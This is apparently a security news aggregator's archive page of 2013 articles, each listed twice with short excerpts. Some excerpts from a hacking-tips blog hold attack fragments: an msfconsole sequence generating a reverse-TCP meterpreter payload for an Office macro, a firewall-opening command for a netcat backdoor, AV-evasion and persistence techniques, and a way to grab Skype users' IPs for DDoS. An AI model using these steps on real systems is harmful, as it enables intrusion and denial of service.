All Articles

Ordered by Date Published : Year: "2013"
and by Page: 1 (of 3) > >>

Total Articles in this collection: 175

Navigation Help at the bottom of the page
Article: Episode #173: Tis the Season - published over 10 years ago.
Content: Hal finds some cheer From somewhere near the borders of scriptistan, we send you: function t { for ((i=0; $i < $1; i++)); do s=$((8-$i)); e=$((8+$i)); for ((j=0; j <= $e; j++)); do [ $j -ge $s ] && echo -n '^' || echo -n ' '; done; echo; done } function T { for ((i=0; $i < $1; i++)); do for ((j=...
http://blog.commandlinekungfu.com/2013/12/episode-173-tis-season.html   
Published: 2013 12 31 10:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Episode #173: Tis the Season - published over 10 years ago.
Content: Hal finds some cheer From somewhere near the borders of scriptistan, we send you: function t { for ((i=0; $i < $1; i++)); do s=$((8-$i)); e=$((8+$i)); for ((j=0; j <= $e; j++)); do [ $j -ge $s ] && echo -n '^' || echo -n ' '; done; echo; done } function T { for ((i=0; $i < $1; i++)); do for ((j=...
http://blog.commandlinekungfu.com/2013/12/episode-173-tis-season.html   
Published: 2013 12 31 10:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Photo - published over 10 years ago.
Content:
https://potatohatsecurity.tumblr.com/post/70673517569   
Published: 2013 12 21 10:42:58
Received: 2021 06 06 09:04:58
Feed: Team PotatoSec
Source: Team PotatoSec
Category: Cyber Security
Topic: Cyber Security
Article: Photo - published over 10 years ago.
Content:
https://potatohatsecurity.tumblr.com/post/70673517569   
Published: 2013 12 21 10:42:58
Received: 2021 06 06 09:04:58
Feed: Team PotatoSec
Source: Team PotatoSec
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Article: Best of the Best in 2013: The Armory - published over 10 years ago.
Content: Everyone likes something for free. And there is no better place to go to get free analysis, intelligence and tools than The Armory on M-Unition. During the past year, we've offered intelligence and analysis on new threat activity, sponsored open source projects and offered insight on free tools like Redline™, all of which has been high...
http://www.fireeye.com/blog/threat-research/2013/12/2013-armory.html   
Published: 2013 12 20 21:48:44
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: Best of the Best in 2013: The Armory - published over 10 years ago.
Content: Everyone likes something for free. And there is no better place to go to get free analysis, intelligence and tools than The Armory on M-Unition. During the past year, we've offered intelligence and analysis on new threat activity, sponsored open source projects and offered insight on free tools like Redline™, all of which has been high...
http://www.fireeye.com/blog/threat-research/2013/12/2013-armory.html   
Published: 2013 12 20 21:48:44
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: Creating custom username list & wordlist for bruteforciing. - published over 10 years ago.
Content: During brute-forcing every time you need custom  password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration. Creating custom username list:...
https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html   
Published: 2013 12 18 08:34:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Creating custom username list & wordlist for bruteforciing. - published over 10 years ago.
Content: During brute-forcing every time you need custom  password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration. Creating custom username list:...
https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html   
Published: 2013 12 18 08:34:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Score Summary
Cyber Tzar Score Summary
Article: Affiliate System Drops ZeroAccess. - published over 10 years ago.
Content: I was recently looking around on darkode and I found this affiliate. This affiliate was recently covered by @kafeine here. I began talking to the owner/operator of this affiliate system and after a few edits to cracked Blackhole (lol) i sent him my faked stats and I was quickly accepted. Whats an affiliate? An affiliate is a system were a content owner pays...
http://trojan7malware.blogspot.com/2013/12/affiliate-system-drops-zeroaccess.html   
Published: 2013 12 17 17:31:00
Received: 2024 03 20 04:23:50
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Affiliate System Drops ZeroAccess. - published over 10 years ago.
Content: I was recently looking around on darkode and I found this affiliate. This affiliate was recently covered by @kafeine here. I began talking to the owner/operator of this affiliate system and after a few edits to cracked Blackhole (lol) i sent him my faked stats and I was quickly accepted. Whats an affiliate? An affiliate is a system were a content owner pays...
http://trojan7malware.blogspot.com/2013/12/affiliate-system-drops-zeroaccess.html   
Published: 2013 12 17 17:31:00
Received: 2024 03 20 04:23:50
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: OpenIOC Series: Investigating with Indicators of Compromise (IOCs) – Part I - published over 10 years ago.
Content: Written by Devon Kerr & Will Gibb The Back to Basics: OpenIOC blog series previously discussed how Indicators of Compromise (IOCs) can be used to codify information about malware or utilities and describe an attacker's methodology. Also touched on were the parts of an IOC, such as the metadata, references, and definition sec...
http://www.fireeye.com/blog/threat-research/2013/12/openioc-series-investigating-indicators-compromise-iocs.html   
Published: 2013 12 16 20:58:10
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: OpenIOC Series: Investigating with Indicators of Compromise (IOCs) – Part I - published over 10 years ago.
Content: Written by Devon Kerr & Will Gibb The Back to Basics: OpenIOC blog series previously discussed how Indicators of Compromise (IOCs) can be used to codify information about malware or utilities and describe an attacker's methodology. Also touched on were the parts of an IOC, such as the metadata, references, and definition sec...
http://www.fireeye.com/blog/threat-research/2013/12/openioc-series-investigating-indicators-compromise-iocs.html   
Published: 2013 12 16 20:58:10
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Article: Taming ROP on Sandy Bridge - Georg Wicherski (May 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]...
https://www.reddit.com/r/vrd/comments/1s15el/taming_rop_on_sandy_bridge_georg_wicherski_may/   
Published: 2013 12 03 23:17:28
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: Taming ROP on Sandy Bridge - Georg Wicherski (May 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]...
https://www.reddit.com/r/vrd/comments/1s15el/taming_rop_on_sandy_bridge_georg_wicherski_may/   
Published: 2013 12 03 23:17:28
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Article: Bochspwn: Exploiting Kernel Race Conditions Found via Memory Access Patterns - Mateusz "j00ru" Jurczyk and Gynvael Coldwind (May 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]
https://www.reddit.com/r/vrd/comments/1s14rw/bochspwn_exploiting_kernel_race_conditions_found/   
Published: 2013 12 03 23:10:59
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: Bochspwn: Exploiting Kernel Race Conditions Found via Memory Access Patterns - Mateusz "j00ru" Jurczyk and Gynvael Coldwind (May 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]
https://www.reddit.com/r/vrd/comments/1s14rw/bochspwn_exploiting_kernel_race_conditions_found/   
Published: 2013 12 03 23:10:59
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: PS4 jailbreak - published over 10 years ago.
Content: I'm taking NO CREDIT for this jailbreak. This jailbreak was done by @reckz0r ______                 _             _____        | ___ \               | |           |  _  |       | |_/ /   ___    ___  | | __  ____  | |/' |  _ __ |    /   / _ \  / __| | |/ / |_  /  |  /| | | '__|| |\ \  |  __/ | (__  |   <   / /   \ |_/ / | |   2011-present\_| \_|  \___|  \_...
http://trojan7malware.blogspot.com/2013/12/ps4-jailbreak.html   
Published: 2013 12 01 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: PS4 jailbreak - published over 10 years ago.
Content: I'm taking NO CREDIT for this jailbreak. This jailbreak was done by @reckz0r ______                 _             _____        | ___ \               | |           |  _  |       | |_/ /   ___    ___  | | __  ____  | |/' |  _ __ |    /   / _ \  / __| | |/ / |_  /  |  /| | | '__|| |\ \  |  __/ | (__  |   <   / /   \ |_/ / | |   2011-present\_| \_|  \___|  \_...
http://trojan7malware.blogspot.com/2013/12/ps4-jailbreak.html   
Published: 2013 12 01 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Impact Distribution
Cyber Tzar Risk Impact Distribution
Article: Sigreturn Oriented Programming (Erik Bosman's OHM2013 work) - published over 10 years ago.
Content: submitted by /u/turnersr [link] [comments]
https://www.reddit.com/r/vrd/comments/1rpvzh/sigreturn_oriented_programming_erik_bosmans/   
Published: 2013 11 29 17:19:55
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: Sigreturn Oriented Programming (Erik Bosman's OHM2013 work) - published over 10 years ago.
Content: submitted by /u/turnersr [link] [comments]
https://www.reddit.com/r/vrd/comments/1rpvzh/sigreturn_oriented_programming_erik_bosmans/   
Published: 2013 11 29 17:19:55
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Article: KASLR Bypass Mitigations in Windows 8.1 - Alex Ionescu (November 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]
https://www.reddit.com/r/vrd/comments/1rpsj5/kaslr_bypass_mitigations_in_windows_81_alex/   
Published: 2013 11 29 16:29:41
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: KASLR Bypass Mitigations in Windows 8.1 - Alex Ionescu (November 2013) - published over 10 years ago.
Content: submitted by /u/HockeyInJune [link] [comments]
https://www.reddit.com/r/vrd/comments/1rpsj5/kaslr_bypass_mitigations_in_windows_81_alex/   
Published: 2013 11 29 16:29:41
Received: 2021 06 06 11:29:11
Feed: Vulnerability Research and Development
Source: Vulnerability Research and Development
Category: Alerts
Topic: Vulnerabilities
Article: XPATH Injection Tutorial - published over 10 years ago.
Content: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner. We are gonna learn using simple example. Downloa...
https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html   
Published: 2013 11 29 13:14:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: XPATH Injection Tutorial - published over 10 years ago.
Content: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner. We are gonna learn using simple example. Downloa...
https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html   
Published: 2013 11 29 13:14:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Episode #172: Who said bigger is better? - published over 10 years ago.
Content: Tim sweats the small stuff Ted S. writes in: "I have a number of batch scripts which turn a given input file into a configurable amount of versions, all of which will contain identical data content, but none of which, ideally, contain the same byte content. My problem is, how do I, using *only* XP+ cmd (no other scripting - PowerShell, jsh, wsh, &c), ...
http://blog.commandlinekungfu.com/2013/11/episode-172-who-said-bigger-is-better.html   
Published: 2013 11 26 09:18:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Episode #172: Who said bigger is better? - published over 10 years ago.
Content: Tim sweats the small stuff Ted S. writes in: "I have a number of batch scripts which turn a given input file into a configurable amount of versions, all of which will contain identical data content, but none of which, ideally, contain the same byte content. My problem is, how do I, using *only* XP+ cmd (no other scripting - PowerShell, jsh, wsh, &c), ...
http://blog.commandlinekungfu.com/2013/11/episode-172-who-said-bigger-is-better.html   
Published: 2013 11 26 09:18:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Article: Broken Authentication & Session Management in Mutillidae - published over 10 years ago.
Content: Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection. Authentication Bypass Privilege Escalation Username Enumeration We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use a...
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html   
Published: 2013 11 20 08:34:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Broken Authentication & Session Management in Mutillidae - published over 10 years ago.
Content: Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection. Authentication Bypass Privilege Escalation Username Enumeration We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use a...
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html   
Published: 2013 11 20 08:34:00
Received: 2024 02 20 16:42:59
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Critical Infrastructure Beyond the Power Grid - published over 10 years ago.
Content: The term "critical infrastructure" has earned its spot on the board of our ongoing game of cyber bingo--right next to "Digital Pearl Harbor," "Cyber 9/11," "SCADA" and "Stuxnet." With "critical infrastructure" thrown about in references to cyber threats nearly every week, we thought it was time for a closer look at just what the te...
http://www.fireeye.com/blog/threat-research/2013/11/critical-infrastructure-power-grid.html   
Published: 2013 11 19 21:26:40
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: Critical Infrastructure Beyond the Power Grid - published over 10 years ago.
Content: The term "critical infrastructure" has earned its spot on the board of our ongoing game of cyber bingo--right next to "Digital Pearl Harbor," "Cyber 9/11," "SCADA" and "Stuxnet." With "critical infrastructure" thrown about in references to cyber threats nearly every week, we thought it was time for a closer look at just what the te...
http://www.fireeye.com/blog/threat-research/2013/11/critical-infrastructure-power-grid.html   
Published: 2013 11 19 21:26:40
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: How Cyber Insurance Can Guard Enterprises Against Class Action Lawsuits - published over 10 years ago.
Content:
https://www.securitymagazine.com/articles/84951-how-cyber-insurance-can-guard-enterprises-against-class-action-lawsuits   
Published: 2013 11 18 06:00:00
Received: 2021 04 25 02:14:07
Feed: Security Magazine – Reports
Source: Security Magazine
Category: Reports
Topic: Cyber Security
Article: How Cyber Insurance Can Guard Enterprises Against Class Action Lawsuits - published over 10 years ago.
Content:
https://www.securitymagazine.com/articles/84951-how-cyber-insurance-can-guard-enterprises-against-class-action-lawsuits   
Published: 2013 11 18 06:00:00
Received: 2021 04 25 02:14:07
Feed: Security Magazine – Reports
Source: Security Magazine
Category: Reports
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: How to solve compile error in veil? - published over 10 years ago.
Content: As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload. pure windows/meterpreter/reverse_tcp stager, no shellcode pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode...
https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html   
Published: 2013 11 16 11:59:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: How to solve compile error in veil? - published over 10 years ago.
Content: As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload. pure windows/meterpreter/reverse_tcp stager, no shellcode pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode...
https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html   
Published: 2013 11 16 11:59:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Groups Explained
Article: Username Enumeration in Mutillidae using Burpe Intruder. - published over 10 years ago.
Content: Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account. In M...
https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html   
Published: 2013 11 11 07:46:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Username Enumeration in Mutillidae using Burpe Intruder. - published over 10 years ago.
Content: Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account. In M...
https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html   
Published: 2013 11 11 07:46:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: List of Differnet AV evasion Frameworks. - published over 10 years ago.
Content: Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload. (1)Veil:- Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html   
Published: 2013 10 30 10:20:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: List of Differnet AV evasion Frameworks. - published over 10 years ago.
Content: Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload. (1)Veil:- Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html   
Published: 2013 10 30 10:20:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Backdoor using Netcat, cryptcat , ncat. - published over 10 years ago.
Content: Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command. netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL Attacker `s I.P : 192.168.56.1 Victim`s I.P.     : 192.168.56.101 We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html   
Published: 2013 10 24 12:00:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Backdoor using Netcat, cryptcat , ncat. - published over 10 years ago.
Content: Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command. netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL Attacker `s I.P : 192.168.56.1 Victim`s I.P.     : 192.168.56.101 We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html   
Published: 2013 10 24 12:00:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Get shell Using Shellcode in Macro. - published over 10 years ago.
Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/meterpreter/reverse_tcp set LHOST 192.168.56.102 set LPORT 443 generate -t vba exploit Now we have generated our shellcode. Now we will create macro. (1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html   
Published: 2013 10 18 09:42:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Get shell Using Shellcode in Macro. - published over 10 years ago.
Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/meterpreter/reverse_tcp set LHOST 192.168.56.102 set LPORT 443 generate -t vba exploit Now we have generated our shellcode. Now we will create macro. (1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html   
Published: 2013 10 18 09:42:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Oracle Critical Patch Update Advisory - October 2013 - published over 10 years ago.
Content:
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html   
Published: 2013 10 15 19:30:54
Received: 2021 06 06 09:03:27
Feed: Oracle Security Alerts
Source: Oracle Security Alerts
Category: Alerts
Topic: Vulnerabilities
Article: Oracle Critical Patch Update Advisory - October 2013 - published over 10 years ago.
Content:
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html   
Published: 2013 10 15 19:30:54
Received: 2021 06 06 09:03:27
Feed: Oracle Security Alerts
Source: Oracle Security Alerts
Category: Alerts
Topic: Vulnerabilities
Cyber Tzar Re-Score Report
Cyber Tzar Re-Score Report
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: How to detect Avast Antivirus remotely? - published over 10 years ago.
Content: During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not? Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html   
Published: 2013 10 14 14:19:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: How to detect Avast Antivirus remotely? - published over 10 years ago.
Content: During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not? Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html   
Published: 2013 10 14 14:19:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Fun with skype resolver - published over 10 years ago.
Content: Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them. If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1 Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html   
Published: 2013 10 11 13:36:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Fun with skype resolver - published over 10 years ago.
Content: Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them. If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1 Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html   
Published: 2013 10 11 13:36:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Re-Score Report
Cyber Tzar Re-Score Report
Article: Episode #171: Flexibly Finding Firewall Phrases - published over 10 years ago.
Content: Old Tim answers an old email Patrick Hoerter writes in: I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only th...
http://blog.commandlinekungfu.com/2013/10/episode-171-flexibly-finding-firewall.html   
Published: 2013 10 08 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Episode #171: Flexibly Finding Firewall Phrases - published over 10 years ago.
Content: Old Tim answers an old email Patrick Hoerter writes in: I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only th...
http://blog.commandlinekungfu.com/2013/10/episode-171-flexibly-finding-firewall.html   
Published: 2013 10 08 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: New FTP RAT - published over 10 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: New FTP RAT - published over 10 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Get shell using Missing Autoruns. - published over 10 years ago.
Content: In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc. (A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html   
Published: 2013 10 07 07:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Get shell using Missing Autoruns. - published over 10 years ago.
Content: In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc. (A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html   
Published: 2013 10 07 07:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Schedule Task in windows after Exploitation. - published over 10 years ago.
